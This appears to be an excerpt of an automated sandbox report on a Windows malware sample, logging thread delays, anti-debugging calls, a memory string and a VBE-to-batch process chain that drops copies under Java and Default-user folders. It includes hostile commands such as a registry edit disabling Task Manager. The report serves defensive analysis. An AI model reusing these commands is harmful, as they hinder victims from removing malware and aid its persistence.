                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595828
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595719
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595609
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595391
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595266
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595156
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595047
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594937
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594827
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594717
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594608
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594391
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594229
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593323
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593169
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593062
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592953
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592833
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592703
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592591
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592483
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592374
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592266
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592156
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592047
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Local\discordJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\LocalJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordllJump to behavior
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1753216052.000000001D1B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: 1znAXdPcM5.exe, Agentcomponentbrokermonitordhcp.exe.0.dr, aXnWbWpBWYJmkhPMHrrUNM.exe1.5.dr, aXnWbWpBWYJmkhPMHrrUNM.exe0.5.dr, RuntimeBroker.exe.5.dr, aXnWbWpBWYJmkhPMHrrUNM.exe.5.drBinary or memory string: RMqkqemUuiKkl0dOtBV
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe.5.drBinary or memory string: Q4B1DqVDVXmAyxvmCi5C
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1752499579.000000001B65A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1752499579.000000001B65A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA
                                    Source: w32tm.exe, 0000001E.00000002.1793947102.000001FB2E1C8000.00000004.00000020.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4139533274.0000000000E47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeAPI call chain: ExitProcess graph end nodegraph_0-25083
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0059F838
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005A7DEE mov eax, dword ptr fs:[00000030h]0_2_005A7DEE
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005AC030 GetProcessHeap,0_2_005AC030
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0059F838
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059F9D5 SetUnhandledExceptionFilter,0_2_0059F9D5
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0059FBCA
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_005A8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005A8EBD
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe "C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe" Jump to behavior
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059F654 cpuid 0_2_0059F654
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0059AF0F
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeQueries volume information: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeQueries volume information: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeQueries volume information: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
